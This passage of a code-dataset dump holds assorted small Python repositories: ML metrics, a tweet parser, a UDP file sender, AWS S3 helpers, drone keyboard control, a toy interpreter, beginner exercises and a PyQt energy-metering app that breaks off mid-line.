union.astype(np.float32)\n return np.mean(iou)","repo_name":"Subrata132/image-segmentaion-unet","sub_path":"metrics/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11387558454","text":"from setuptools import setup, find_packages\nimport codecs\nimport os\n\nroot_directory = os.path.abspath(os.path.dirname(__file__))\n\nwith codecs.open(os.path.join(root_directory, \"README.md\"), encoding = \"utf-8\") as file_handle:\n long_description = \"\\n\" + file_handle.read()\n \nVERSION = \"0.2.0\"\nDESCRIPTION = \"Hagstrom Electronics key/mouse emulator interface\"\nLONG_DESCRIPTION = \"Abstraction module for Hagstrom Electronics usbtousb key/mouse emulators\"\n\nsetup(\n name = \"hagstrom\",\n version = VERSION,\n author = \"xiuxiu62 (Justin Cremer)\",\n 
author_email = \"\",\n description = DESCRIPTION,\n long_description = LONG_DESCRIPTION,\n long_description_content_type = \"text/markdown\",\n url = \"https://github.com/xiuxiu62/lib-hagstrom\",\n packages = find_packages(),\n classifiers = [\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ]\n)\n","repo_name":"xiuxiu62/lib-hagstrom","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25940781326","text":"import sys\n\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\n\nA = list(map(int, input().split()))\nlp, rp = 0, 0\nans = 0\n\ntmp_sum = A[0]\n\nwhile True:\n if tmp_sum == M:\n ans += 1\n if rp == N - 1:\n break\n else:\n tmp_sum -= A[lp] - A[rp + 1]\n lp += 1\n rp += 1\n elif tmp_sum < M:\n if rp == N - 1:\n break\n else:\n rp += 1\n tmp_sum += A[rp]\n elif lp < rp:\n tmp_sum -= A[lp]\n lp += 1\n else:\n if rp == N - 1:\n break\n else:\n tmp_sum -= A[lp] - A[rp + 1]\n lp += 1\n rp += 1\n\nprint(ans)\n","repo_name":"hyunsik96/problem-solving","sub_path":"필수문항/40_수들의합.py","file_name":"40_수들의합.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15536630671","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 29 15:46:01 2014\n\n@author: aastha\n\"\"\"\n\nimport json\nimport pprint\n\npath=\"/Users/aastha/Desktop/Semester3/Data Mining/CourseProject/Data/tweets.txt\"\nlogfilepath=\"/Users/aastha/Desktop/Semester3/Data Mining/CourseProject/Data/Formattedtweets.txt\"\nout_path=\"/Users/aastha/Desktop/Semester3/Data Mining/CourseProject/Data/TwitterFields.csv\"\n\ndata = []\nwith open(path) as f:\n for line in f:\n data.append(json.loads(line))\n\nlogfile=open(logfilepath,'w')\npprint.pprint(data,logfile)\n\ncreation_time=\"\"\nactual_creation=\"\"\nactual_favcount=\"\"\nactual_user_id=\"\"\nactual_user_screenname=\"\"\nhashtag=\"\"\nretweet_count = \"\" \nfav_count=\"\"\nreplyto= \"\"\ntext = \"\"\nuser_screenname=\"\"\nuser_screenname=\"\"\n\nout_file=open(out_path,'w')\nout_file.write(\"creation_time, actual_creation, actual_favcount, actual_user_id, actual_user_screenname, hashtag, retweet_count,fav_count, replyto, text, user_screenname, user_id\\n\")\n\nfor i in range(len(data)):\n #if we do not have creation time, then we can skip that tweet and all other fields about it \n if data[i].has_key('created_at'):\n creation_time=data[i]['created_at']\n else:\n continue\n if(data[i].has_key('retweeted_status')):\n #retweet status (we need to keep track if it SBT) \n actual_creation=data[i]['retweeted_status']['created_at']\n actual_favcount=data[i]['retweeted_status']['favorite_count']\n actual_user_id=data[i]['retweeted_status']['user']['id_str']\n actual_user_screenname=data[i]['retweeted_status']['user']['screen_name']\n \n #more Tweet information\n if(data[i]['entities'].has_key('hashtags')):\n if(len(data[i]['entities']['hashtags'])>0):\n hashtag= data[i][u'entities'][u'hashtags'][0]['text']\n #url1= data[i][u'entities'][u'media'][0][u'expanded_url']\n #url2= data[i][u'entities'][u'media'][0][u'url']\n retweet_count = data[i]['retweet_count'] \n fav_count=data[i]['favorite_count']\n replyto= data[i]['in_reply_to_screen_name']\n text = data[i][u'text'].replace(',','')\n text = text.replace('\\n','')\n text = text.replace('\\r','')\n\n #user 
information (to know what each individual user is doing)\n user_screenname=data[i]['user']['screen_name']\n user_id=data[i]['user']['id_str'] \n out_file.write('%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\\n'% (creation_time, actual_creation, actual_favcount, actual_user_id, actual_user_screenname, hashtag, retweet_count,fav_count, replyto, text, user_screenname, user_id)) \n \nout_file.flush()\nout_file.close()\n","repo_name":"abitofalchemy/DmChallenge","sub_path":"Scripts/Aastha/DecodeData.py","file_name":"DecodeData.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16360628704","text":"import socket\nimport sys\n\nsender = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\nhost = sys.argv[1]\nport = 12345\nbuf = 1024\n\naddr = (host,port)\nfileName = sys.argv[2]\nprint((\"{}\").format(fileName))\nfileNameb=bytes(fileName,'utf-8')\nsender.sendto(fileNameb,addr)\n\nf = open(fileName,\"rb\")\ndata = f.read(buf)\nprint((\"Data:{}\").format(data)) \n#byt = bytes(data,\"utf-8\")\nwhile data:\n if(sender.sendto(data,addr)):\n print(\"Sending\")\n data = f.read(buf)\n #byt = byte(data,\"utf-8\")\n else:\n print(\"Finished Sending\")\n","repo_name":"KannanManism/Networking-Python","sub_path":"pythonUDPSocket/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41485721049","text":"import os\nimport logging\nimport json\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom boto3.s3.transfer import TransferConfig\nimport requests\n\nbucket_name = 'myfiles07'\n\ndef upload_file(file_name, bucket, object_name=None):\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = os.path.basename(file_name)\n\n # Upload the file\n s3_client = boto3.client('s3')\n try:\n response = s3_client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True\n# upload_file(\"./data.json\", bucket_name, \"data.json\")\n\ndef delete_non_empty_bucket(bucket):\n s3_client = s3 = boto3.resource('s3') \n bucketClient = s3_client.Bucket(bucket)\n bucketClient.objects.all().delete()\n bucketClient.meta.client.delete_bucket(Bucket=bucket)\n#delete_non_empty_bucket(bucket_name)\n\ndef delete_object(bucket,object_name):\n s3_client = boto3.client('s3')\n response = s3_client.delete_object(Bucket=bucket,Key=object_name)\n print(response)\ndelete_object(bucket_name, \"data.json\")\n\nimport json\nimport boto3\n\n\ns3 = boto3.client('s3')\n\ndef lambda_handler(event, context):\n source_bucket = event['Records'][0]['s3']['bucket']['name']\n object_key = event['Records'][0]['s3']['object']['key']\n target_bucket = 'myfiles08'\n copy_source = {'Bucket': source_bucket, 'Key': object_key}\n print (\"Source bucket : \", source_bucket)\n print (\"Target bucket : \", target_bucket)\n try:\n waiter = s3.get_waiter('object_exists')\n waiter.wait(Bucket=source_bucket, Key=object_key)\n s3.copy_object(Bucket=target_bucket, Key=object_key, CopySource=copy_source)\n return {\n 'statusCode': 200,\n 'body': json.dumps('File has been Successfully Copied')\n }\n except Exception as err:\n print (\"Error -\"+str(err))\n return 
err","repo_name":"mukeshmk7/AWS","sub_path":"S3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5807842094","text":"import KeyPresscontrol as kp\nfrom djitellopy import tello\nfrom time import sleep\nimport cv2\n\ndef get_keyboard_input():\n lr,fb,ud,yv = 0,0,0,0\n speed = 50\n if kp.get_key(\"LEFT\"): lr = -speed\n elif kp.get_key(\"RIGHT\"): lr = speed\n if kp.get_key(\"UP\"):\n fb = speed\n elif kp.get_key(\"DOWN\"):\n fb = -speed\n if kp.get_key(\"w\"):\n ud = speed\n elif kp.get_key(\"s\"):\n ud = -speed\n if kp.get_key(\"a\"):\n yv = speed\n elif kp.get_key(\"d\"):\n yv = -speed\n if kp.get_key(\"q\"): mytello.land()\n if kp.get_key(\"e\"): mytello.takeoff()\n\n return [lr,fb,ud,yv]\nif __name__ == '__main__':\n\n kp.init()\n\n mytello = tello.Tello()\n mytello.connect()\n print(mytello.get_battery())\n\n mytello.streamon()\n\n while True:\n img = mytello.get_frame_read().frame\n img = cv2.resize(img,(360,240))\n cv2.imshow('image',img)\n values = get_keyboard_input()\n mytello.send_rc_control(values[0],values[1],values[2],values[3])\n cv2.waitKey(1)\n\n\n","repo_name":"zhz03/Tellodrone_project","sub_path":"tellodrone_basic/image_control.py","file_name":"image_control.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37642517975","text":"import pprint\n\nmsg = \"This is a bright summer day. Everthing supposed to go fine\"\ncount = {}\n\nfor char in msg:\n count.setdefault(char, 0)\n count[char] += 1\n\nprint(count)\npprint.pprint(count)\n","repo_name":"rahulgoyal01/PyPractice","sub_path":"ATBS Udemy/Lessons practice/String List and same/charCount.py","file_name":"charCount.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3777462452","text":"output = []\n\ndef error(n, msg):\n\toutput.append(f\"ERROR LINE [{n + 1}]: {msg}\")\n\ndef interpret(syntax, content):\n\tglobal output\n\toutput = []\n\n\tvariables = {}\n\n\t# Replace math symbols with \"proper\" math symbols\n\tcontent = content.replace(syntax.operator[\"add\"], \"+\")\n\tcontent = content.replace(syntax.operator[\"sub\"], \"-\")\n\tcontent = content.replace(syntax.operator[\"mul\"], \"*\")\n\tcontent = content.replace(syntax.operator[\"div\"], \"/\")\n\tcontent = content.replace(syntax.operator[\"mod\"], \"%\")\n\tcontent = content.replace(syntax.print[\"open\"], f'{syntax.print[\"open\"]} ')\n\tcontent = content.replace(syntax.print[\"close\"], f' {syntax.print[\"close\"]}')\n\n\tlines = content.split(\"\\n\")\n\n\tfor i, line in enumerate(lines):\n\t\tline = line.strip()\n\t\twords = line.split(\" \")\n\t\t\n\t\tfor word in range(len(words)):\n\t\t\twords[word] = words[word].strip()\n\n\t\t# Get Variables\n\t\tif len(words) > 3:\n\t\t\tif words[0] == syntax.variable[\"prefix\"]:\n\t\t\t\tif words[2] == syntax.variable[\"assign\"]:\n\t\t\t\t\tvalue = line[line.find(f' {syntax.variable[\"assign\"]}') + len(syntax.variable[\"assign\"]) + 1:].strip()\n\n\t\t\t\t\tvariables[words[1]] = value\n\t\t\t\telse:\n\t\t\t\t\terror(i, f'You did not assign the variable with: {syntax.variable[\"assign\"]}')\n\t\t\t\t\tcontinue\n\n\t\t# Replace Variables\n\t\tfor j, word in enumerate(words):\n\t\t\tif word in variables:\n\t\t\t\twords[j] = variables[word]\n\n\t\t# Print\n\t\tif words[0] == 
syntax.print[\"open\"]:\n\t\t\tif words[-1] == syntax.print[\"close\"]:\n\t\t\t\ttext = \" \".join(words[1:-1]).strip()\n\n\t\t\t\tif len(words) == 2 or len(text) == 0:\n\t\t\t\t\toutput.append(\"\\n\")\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Math\n\t\t\t\tmath = False\n\t\t\t\tfor x in range(0, 10):\n\t\t\t\t\tif str(x) in text:\n\t\t\t\t\t\tmath = True\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tresult = eval(text)\n\t\t\t\t\t\t\toutput.append(result)\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\terror(i, \"Invalid math. Make sure it matches your syntax or that the variables exists\")\n\t\t\t\t\t\tbreak\n\t\t\t\tif math:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# String\n\t\t\t\tif len(text) >= 2:\n\t\t\t\t\tif text[0] == '\"' and text[-1] == '\"':\n\t\t\t\t\t\toutput.append(text[1:-1])\n\t\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\terror(i, 'Unknown variable(s) (put \"double quotes\" around the text to print directly)')\n\n\t\t\telse:\n\t\t\t\terror(i, f'`{syntax.print[\"open\"]}` is not closed with `{syntax.print[\"close\"]}`')\n\t\t\t\tcontinue\n\n\treturn output\n","repo_name":"BenStigsen/Programming-Webapplication","sub_path":"interpret.py","file_name":"interpret.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"7863935596","text":"# Bill\nprint(\"Welcome to the tip calculator!\")\n\nbill = input(\"What was total bill? $\")\nbill_as_float= float(bill)\n\ntip = input(\"What percentage tip would you like to give? 10, 12 or 15? \")\ntip_as_int = int(tip)\n\npeople = input(\"How many people split the bill? \")\npeople_as_int = int(people)\n\ntip_as_percent = tip_as_int/100\ntotal_tip_amount = bill_as_float * tip_as_percent\nbill_total = total_tip_amount + bill_as_float\nbill_per_person = bill_total / people_as_int\nfinal_amount = round(bill_per_person, 2)\n\nprint(f\"Each person should pay: ${final_amount}\")","repo_name":"leatuan021211/100DaysToLearnPython","sub_path":"Day-2/Video11Day2.py","file_name":"Video11Day2.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11843607767","text":"# 练习2:根据月份计算天数。\nmonth = int(input(\"请输入月份:\"))\nday_of_month = (31,28,31,30,31,30,31,31,30,31,30,31)\nmonth1 = (2,)\nmonth2 = (4,6,9,11)\nmonth3 = (1,3,5,7,8,10,12)\nif month in month1:\n print(\"28\")\nelif month in month2:\n print(\"30\")\nelif month in month3:\n print(\"31\")\nelse:\n print(\"error month\")\n\nprint(day_of_month[month-1])","repo_name":"ShijieLiu-PR/Python_Learning","sub_path":"month01/python base/day05/exercise02.py","file_name":"exercise02.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15312190609","text":"from Classes.Inheritance.class_example57 import Person\n\nclass MITPerson(Person):\n \"\"\"This class describes about the person from MIT\"\"\"\n nextIdnum = 0\n\n def __init__(self, name):\n Person.__init__(self, name)\n self.Idnum = MITPerson.nextIdnum\n MITPerson.nextIdnum+=1\n\n def getIdNum(self):\n \"\"\"This returns the MIT ID num\"\"\"\n return self.Idnum\n\n def __lt__(self, other):\n \"\"\"Return whose Id is first\"\"\"\n return self.Idnum < other.Idnum\n\n def speak(self, utterance):\n return (self.getLastName()+\" says:\"+utterance)\n\np1 = MITPerson('Eric')\np2 = MITPerson('John Gutag')\np3 = MITPerson('John Smith')\np4 = Person('John')\n\nif __name__ == '__main__':\n p1 = MITPerson('Mark 
Zukerberg')\n p1.setBirthday(1984,5,14)\n p2 = MITPerson('Drew Houston')\n p2.setBirthday(1983,4,3)\n p3 = Person('Travis Kalanik')\n p4 = Person('Steve Woznaik')\n personlist = [p1,p2,p3,p4]\n for person in personlist:\n print(person)\n personlist.sort()\n print()\n for person in personlist:\n print(person)\n","repo_name":"gsudarshan1990/Training_Projects","sub_path":"Classes/Inheritance/class_example58.py","file_name":"class_example58.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37625576430","text":"#!/usr/bin/env python3\nfrom PyQt5 import uic, QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import Qt ,QRectF, QSize, QTimer, QDate\nfrom PyQt5.QtGui import QPainter, QPixmap, QPen, QFont, QImage, QIcon, QColor\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QGraphicsObject, QGraphicsView, QGraphicsScene, QDesktopWidget, QDialog, QGraphicsTextItem\nimport numpy as np\nimport time\nimport os\nimport json\nfrom settings import *\nfrom datetime import date\nimport openpyxl\nfrom load_energo_files import *\n\nif os.name == 'nt':\n import mysql.connector\nelse:\n import pymysql\n\nfrom datetime import datetime, timedelta\nfrom dateutil.relativedelta import relativedelta\nfrom calendar import monthrange\n\n\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as Canvas\nfrom matplotlib.figure import Figure\n\nimport matplotlib.pyplot as plt\n\n\nh2hour_label = ['00:30', '01:00', '01:30', '02:00', '02:30', '03:00', '03:30', '04:00', '04:30', '05:00', '05:30', '06:00', '06:30', '07:00', '07:30', '08:00', '08:30', '09:00', '09:30', '10:00', '10:30', '11:00', '11:30', '12:00', '12:30', '13:00', '13:30', '14:00', '14:30', '15:00', '15:30', '16:00', '16:30', '17:00', '17:30', '18:00', '18:30', '19:00', '19:30', '20:00', '20:30', '21:00', '21:30', '22:00', '22:30', '23:00', '23:30', '00:00']\n\nmonths_label = ['Січень\\n01', 'Лютий\\n02', 'Березень\\n03', 'Квітень\\n04', 'Травень\\n05', 'Червень\\n06', 'Липень\\n07', 'Серпень\\n08', 'Вересень\\n09', 'Жовтень\\n10', 'Литопад\\n11', 'Грудень\\n12']\nmonths_xls = ['', 'січень', 'лютий', 'березень', 'квітень', 'травень', 'червень', 'липень', 'серпень', 'вересень', 'жовтень', 'литопад', 'грудень']\nmonths_xlsR = ['', 'січня', 'лютого', 'березеня', 'квітня', 'травня', 'червня', 'липня', 'серпня', 'вересня', 'жовтня', 'литопада', 'грудня']\n\n\nForm_main, _ = uic.loadUiType ( pathUI + '/' + \"main.ui\" )\nForm_date, _ = uic.loadUiType ( pathUI + '/' + \"date.ui\" )\nForm_about, _ = uic.loadUiType ( pathUI + '/' + \"about.ui\" )\nForm_error, _ = uic.loadUiType ( pathUI + '/' + \"error.ui\" )\nForm_ok, _ = uic.loadUiType ( pathUI + '/' + \"ok.ui\" )\nForm_que, _ = uic.loadUiType ( pathUI + '/' + \"que.ui\" )\n\n\n\nclass MatplotlibWidget(Canvas):\n def __init__(self, parent=None, title='', xlabel='', ylabel='', dpi=80, hold=False):\n super(MatplotlibWidget, self).__init__(Figure())\n self.setParent(parent)\n self.title = title\n self.xlabel = xlabel\n self.ylabel = ylabel\n self.figure = Figure(dpi=dpi)\n self.canvas = Canvas(self.figure)\n self.theplot = self.figure.add_subplot(111)\n\n\n def plotData(self, x, y, rotation=False):\n self.theplot.set_title(self.title)\n self.theplot.set_xlabel(self.xlabel)\n self.theplot.set_ylabel(self.ylabel)\n \n self.theplot.spines['top'].set_visible(False)\n self.theplot.spines['right'].set_visible(False)\n self.theplot.spines['left'].set_visible(False)\n 
self.theplot.spines['bottom'].set_color('#DDDDDD')\n self.theplot.tick_params(bottom=False, left=False)\n self.theplot.set_axisbelow(True)\n self.theplot.yaxis.grid(True, color='#EEEEEE')\n self.theplot.xaxis.grid(False)\n \n self.theplot.bar(x,y)\n self.draw_idle()\n# print(y)\n for x,y in zip(x,y):\n if y:\n label = \"{:.0f}\".format(y)\n else:\n label = ''\n self.theplot.annotate(label,\n (x, y),\n textcoords=\"offset points\",\n xytext=(1, 5),\n ha='center',\n va='bottom',\n rotation=90)\n\n if rotation:\n for rotation in self.theplot.get_xticklabels():\n rotation.set_rotation(90)\n\n\n def plotClear(self):\n self.theplot.clear()\n\n\n\n\nclass MatplotlibWidgetDiff(Canvas):\n def __init__(self, parent=None, title='', xlabel='', ylabel='', dpi=80, hold=False):\n super(MatplotlibWidgetDiff, self).__init__(Figure())\n self.setParent(parent)\n self.wBox = 0.35\n self.title = title\n self.xlabel = xlabel\n self.ylabel = ylabel\n self.figure = Figure(dpi=dpi)\n self.canvas = Canvas(self.figure)\n self.theplot = self.figure.add_subplot(111)\n\n\n def plotData(self, x, y, y2, year=0, year2=0):\n xnumber = np.arange(len(x))\n self.theplot.set_title(self.title)\n self.theplot.set_xlabel(self.xlabel)\n self.theplot.set_ylabel(self.ylabel)\n self.theplot.set_xticks(xnumber)\n self.theplot.set_xticklabels(x)\n self.theplot.spines['top'].set_visible(False)\n self.theplot.spines['right'].set_visible(False)\n self.theplot.spines['left'].set_visible(False)\n self.theplot.spines['bottom'].set_color('#DDDDDD')\n self.theplot.tick_params(bottom=False, left=False)\n self.theplot.set_axisbelow(True)\n self.theplot.yaxis.grid(True, color='#EEEEEE')\n self.theplot.xaxis.grid(False)\n self.rects1 = self.theplot.bar(xnumber - self.wBox/2, y, self.wBox, label=year)\n self.rects2 = self.theplot.bar(xnumber + self.wBox/2, y2, self.wBox, label=year2)\n self.draw_idle()\n self.autolabel(self.rects1)\n self.autolabel(self.rects2)\n if year:\n self.theplot.legend(loc='upper right', frameon=False)\n\n\n def plotClear(self):\n self.theplot.clear()\n\n\n def autolabel(self, rects):\n for rect in rects:\n height = rect.get_height()\n if height:\n label = '{:.0f}'.format(height)\n else:\n label = ''\n self.theplot.annotate(label,\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom', rotation=90)\n\n\n\n\n\nclass dateDialogUI(QDialog, Form_date):\n def __init__(self, parent=None):\n super(dateDialogUI, self).__init__(parent=parent)\n self.setupUi(self)\n self.setWindowIcon(QtGui.QIcon( pathImage + '/' + \"energo2.png\" ))\n\nclass aboutDialogUI(QDialog, Form_about):\n def __init__(self, parent=None):\n super(aboutDialogUI, self).__init__(parent=parent)\n self.setupUi(self)\n self.setWindowIcon(QtGui.QIcon( pathImage + '/' + \"energo2.png\" ))\n\nclass errorDialogUI(QDialog, Form_error):\n def __init__(self, parent=None):\n super(errorDialogUI, self).__init__(parent=parent)\n self.setupUi(self)\n self.setWindowIcon(QtGui.QIcon( pathImage + '/' + \"energo2.png\" ))\n\nclass okDialogUI(QDialog, Form_ok):\n def __init__(self, parent=None):\n super(okDialogUI, self).__init__(parent=parent)\n self.setupUi(self)\n self.setWindowIcon(QtGui.QIcon( pathImage + '/' + \"energo2.png\" ))\n\nclass queDialogUI(QDialog, Form_que):\n def __init__(self, parent=None):\n super(queDialogUI, self).__init__(parent=parent)\n self.setupUi(self)\n self.setWindowIcon(QtGui.QIcon( pathImage + '/' + \"energo2.png\" ))\n \n \n \nclass MAIN(QMainWindow, 
Form_main): \n def __init__(self):\n super(MAIN, self).__init__()\n self.setupUi(self)\n \n \n self.setWindowIcon(QtGui.QIcon( pathImage + '/' + \"energo2.png\" ))\n qtRectangle = self.frameGeometry()\n centerPoint = QDesktopWidget().availableGeometry().center()\n qtRectangle.moveCenter(centerPoint)\n self.move(qtRectangle.topLeft())\n\n self.sqlcon = None\n\n\n self.action_loadfile.triggered.connect(self.loadFile)\n self.action_loadfile.setShortcut(\"Ctrl+O\")\n self.action_loadfile.setIcon(QIcon(\"img/file.svg\"))\n\n self.action_savefile.triggered.connect(self.saveFile)\n self.action_savefile.setShortcut(\"Ctrl+S\")\n self.action_savefile.setIcon(QIcon(\"img/save.svg\")) \n\n self.action_update.triggered.connect(self.updateAll)\n self.action_update.setShortcut(\"F5\")\n self.action_update.setIcon(QIcon(\"img/update.svg\")) \n\n\n self.action_exit.triggered.connect(self.appquit)\n self.action_exit.setShortcut(\"Ctrl+Q\")\n self.action_exit.setIcon(QIcon(\"img/exit.svg\")) \n\n self.action_about.triggered.connect(self.viewDialogAbout)\n self.action_about.setIcon(QIcon(\"img/about2.svg\")) \n\n self.date = self.getDate(date=datetime.now().strftime(\"%Y%m%d\"), day=-1)\n self.dateChangeMonth = self.date\n self.dateChangeYear = self.date\n self.datebef = self.getDate(date=datetime.now().strftime(\"%Y%m%d\"), day=-2)\n\n\n self.reCalculate()\n self.updateUI()\n self.calendarWidget.setMinimumDate(QDate(2017, 4, 1))\n self.calendarWidget.setSelectedDate(datetime.strptime(self.date, \"%Y%m%d\"))\n self.calendarWidget.selectionChanged.connect(self.dateChanged)\n self.pushButton_loadfile.clicked.connect(self.loadFile)\n self.pushButton_savefile.clicked.connect(self.saveFile)\n self.pushButton_update.clicked.connect(self.updateAll)\n self.pushButton_datenow.clicked.connect(self.dateSetNow)\n self.errorDialogView = errorDialogUI()\n iconErrorPixmap = QPixmap( pathImage + '/' + \"error2.png\" )\n self.errorDialogView.label_icon.setPixmap(iconErrorPixmap)\n self.errorDialogView.pushButton_ok.clicked.connect(self.errorDialogView.close)\n self.okDialogView = okDialogUI()\n iconOKPixmap = QPixmap( pathImage + '/' + \"ok2.png\" )\n self.okDialogView.label_icon.setPixmap(iconOKPixmap)\n self.okDialogView.pushButton_ok.clicked.connect(self.okDialogView.close)\n self.widget_day = None\n self.widget_month = None\n self.widget_year = None\n if os.path.isfile(confile):\n with open(confile) as confjson:\n try:\n self.conf = json.load(confjson)\n except:\n pass\n else:\n self.conf = {}\n self.conf['pathopen'] = '/home'\n self.conf['pathsave'] = '/home'\n\n self.plotDay()\n self.plotMonth()\n self.plotYear()\n \n \n self.okDialogView = okDialogUI()\n iconOKPixmap = QPixmap( pathImage + '/' + \"ok2.png\" )\n self.okDialogView.label_icon.setPixmap(iconOKPixmap)\n self.okDialogView.pushButton_ok.clicked.connect(self.okDialogView.close)\n\n \n# ===================================================================================== defs\n def plotDay(self):\n self.getDayHours(self.date)\n \n if self.widget_day:\n self.widget_day.plotClear()\n else:\n self.widget_day = MatplotlibWidget(self.pltWidget_day, ylabel='кВт/г', dpi=80)\n self.widget_day.setGeometry(QtCore.QRect(-80, 0, 1200, 560))\n if sum(self.h2powers) > 0:\n self.widget_day.plotData(h2hour_label, self.h2powers, rotation=True)\n else:\n zerodata = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\n self.widget_day.plotData(h2hour_label, zerodata, rotation=True)\n\n\n def plotMonth(self):\n days = 
self.getMonthDays(self.date)\n xdate = []\n ypower = []\n for day in days:\n# xdate.append(day['date'].strftime(\"%d.%m\"))\n xdate.append(day['date'][:2])\n ypower.append(day['power'])\n if self.widget_month:\n self.widget_month.plotClear()\n else:\n self.widget_month = MatplotlibWidget(self.pltWidget_month, ylabel='кВт/г', dpi=80)\n self.widget_month.setGeometry(QtCore.QRect(-80, 0, 1200, 560))\n if sum(ypower) > 0:\n self.widget_month.plotData(xdate,ypower)\n else:\n zerodata = []\n for i in range (0,len(xdate)):\n zerodata.append(0)\n self.widget_month.plotData(xdate, zerodata)\n \n\n def plotYear(self):\n ypowerMin1 = []\n xlabel = []\n ypower = []\n dateYear = self.date[:4]\n dateYearMin1 = \"%04.d\" % (float(self.date[:4]) - 1)\n for month in range (1,13):\n apowerMonth = 0\n monthText = \"%02.d\" % month\n xlabel.append(\"%s\" % monthText)\n powerMonthdb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE `apowercnt` > '0' AND YEAR(date) = ('\"+ str(dateYear) +\"') AND MONTH(date) = ('\"+ str(month) +\"') ORDER BY date DESC LIMIT 0,1\")\n powerMonthdbMin1 = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE `apowercnt` > '0' AND YEAR(date) = ('\"+ str(dateYearMin1) +\"') AND MONTH(date) = ('\"+ str(month) +\"') ORDER BY date DESC LIMIT 0,1\")\n\n datedef=self.getMonth(date=\"%s%02.d%02.d\" % (dateYear, month, 1), month=-1)\n powerMonthBefdb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE `apowercnt` > '0' AND YEAR(date) = YEAR('\"+ datedef +\"') AND MONTH(date) = MONTH('\"+ datedef +\"') ORDER BY date DESC LIMIT 0,1\") \n datedefMin1=self.getMonth(date=\"%s%02.d%02.d\" % (dateYearMin1, month, 1), month=-1)\n powerMonthBefdbMin1 = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE `apowercnt` > '0' AND YEAR(date) = YEAR('\"+ datedefMin1 +\"') AND MONTH(date) = MONTH('\"+ datedefMin1 +\"') ORDER BY date DESC LIMIT 0,1\") \n\n if powerMonthdb and powerMonthBefdb:\n if powerMonthdb[0][1] > 0 and powerMonthBefdb[0][1] > 0:\n apowerMonth = powerMonthdb[0][1] - powerMonthBefdb[0][1]\n else:\n apowerMonth = 0\n else:\n apowerMonth = 0\n ypower.append(apowerMonth)\n\n if powerMonthdbMin1 and powerMonthBefdbMin1:\n if powerMonthdbMin1[0][1] > 0 and powerMonthBefdbMin1[0][1] > 0:\n apowerMonthMin1 = powerMonthdbMin1[0][1] - powerMonthBefdbMin1[0][1]\n else:\n apowerMonthMin1 = 0\n else:\n apowerMonthMin1 = 0\n ypowerMin1.append(apowerMonthMin1)\n\n if self.widget_year:\n self.widget_year.plotClear()\n else:\n self.widget_year = MatplotlibWidgetDiff(self.pltWidget_year, ylabel='кВт/г', dpi=80)\n self.widget_year.setGeometry(QtCore.QRect(-80, 0, 1200, 560))\n if sum(ypower) > 0 and sum(ypowerMin1) > 0:\n self.widget_year.plotData(months_label, ypower, ypowerMin1, dateYear, dateYearMin1)\n else:\n zerodata = [0,0,0,0,0,0,0,0,0,0,0,0]\n self.widget_year.plotData(months_label, zerodata, zerodata, '', '')\n\n\n def getDayHours(self, date=None):\n if date:\n today = datetime.strptime(date, \"%Y%m%d\")\n todaydb = datetime.strptime(date, \"%Y%m%d\").strftime(\"%Y-%m-%d\")\n else:\n today = datetime.now()\n todaydb = today.strftime(\"%Y-%m-%d\")\n# print(todaydb)\n h2powerstr = self.sql(\"SELECT `h2apower` FROM \"+ mysql_tbl +\" WHERE `date` = 